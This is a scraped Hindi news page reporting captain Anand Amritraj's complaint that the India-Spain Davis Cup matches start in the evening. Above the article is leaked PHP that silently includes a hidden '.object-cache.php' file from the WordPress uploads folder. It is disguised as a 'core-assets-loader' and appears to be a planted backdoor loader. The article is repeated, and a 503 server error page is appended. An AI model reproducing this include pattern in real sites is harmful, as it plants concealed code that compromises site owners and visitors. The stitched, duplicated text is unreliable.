add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); डेविस कप में भारत-स्पेन का मैच शाम को होने से टीम हैरान : कप्तान – SOCH INDIA
Menu

खेल
डेविस कप में भारत-स्पेन का मैच शाम को होने से टीम हैरान : कप्तान

nobanner

स्पेन के खिलाफ डेविस कप मुकाबले शाम को शुरू होने से भारतीय टीम हैरान है। कप्तान आनंद अमृतराज ने इसे दुर्भाग्यपूर्ण फैसला करार दिया क्योंकि इससे भारत को अपनी सरजमीं पर खेलने का फायदा नहीं मिल सकेगा। एकल मैच शाम पांच बजे शुरू होंगे और युगल मुकाबले सात बजे से खेले जाएंगे। डीएलटीए ने अधिक दर्शकों को स्टेडियम में खींचने के लिये यह पहल की है।

गैर खिलाड़ी कप्तान अमृतराज ने कहा कि उनसे या उनके खिलाड़ियों से इस बारे में राय नहीं ली गई। उन्होंने कहा कि पांच बार के चैम्पियन स्पेन के खिलाफ मुकाबले दिन की गर्मी और उमस में होने चाहिये थे ।

डेविस कप में भारत-स्पेन का मैच शाम को होने से टीम हैरान : कप्तान

स्पेन के खिलाफ डेविस कप मुकाबले शाम को शुरू होने से भारतीय टीम हैरान है। कप्तान आनंद अमृतराज ने इसे दुर्भाग्यपूर्ण फैसला करार दिया क्योंकि इससे भारत को अपनी सरजमीं पर खेलने का फायदा नहीं मिल सकेगा।

उन्होंने कहा कि मुझसे मैचों के टाइमिंग के बारे में पूछा नहीं गया और मुझे यकीन है कि खिलाड़ियों से भी नहीं पूछा गया होगा। रोहन को पता नहीं था और मैने ही उस बताया। हम आम तौर पर दिन में खेलना पसंद करते हैं। शाम का समय स्पेन के खिलाड़ियों को रास आएगा।

उन्होंने कहा कि मैने डेविस कप की वेबसाइट पर मैचों का समय देखा। यह आम धारणा है कि स्पेन की टीम हमसे काफी बेहतर है और इससे फर्क नहीं पड़ता कि वे दिन में खेल रहे हैं या शाम है। यह दुर्भाग्यपूर्ण है क्योंकि हमें मेजबान को अपनी धरती पर खेलने का फायदा देना चाहिए था। डेविस कप में अजीबोगरीब बातें होती रहती है।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.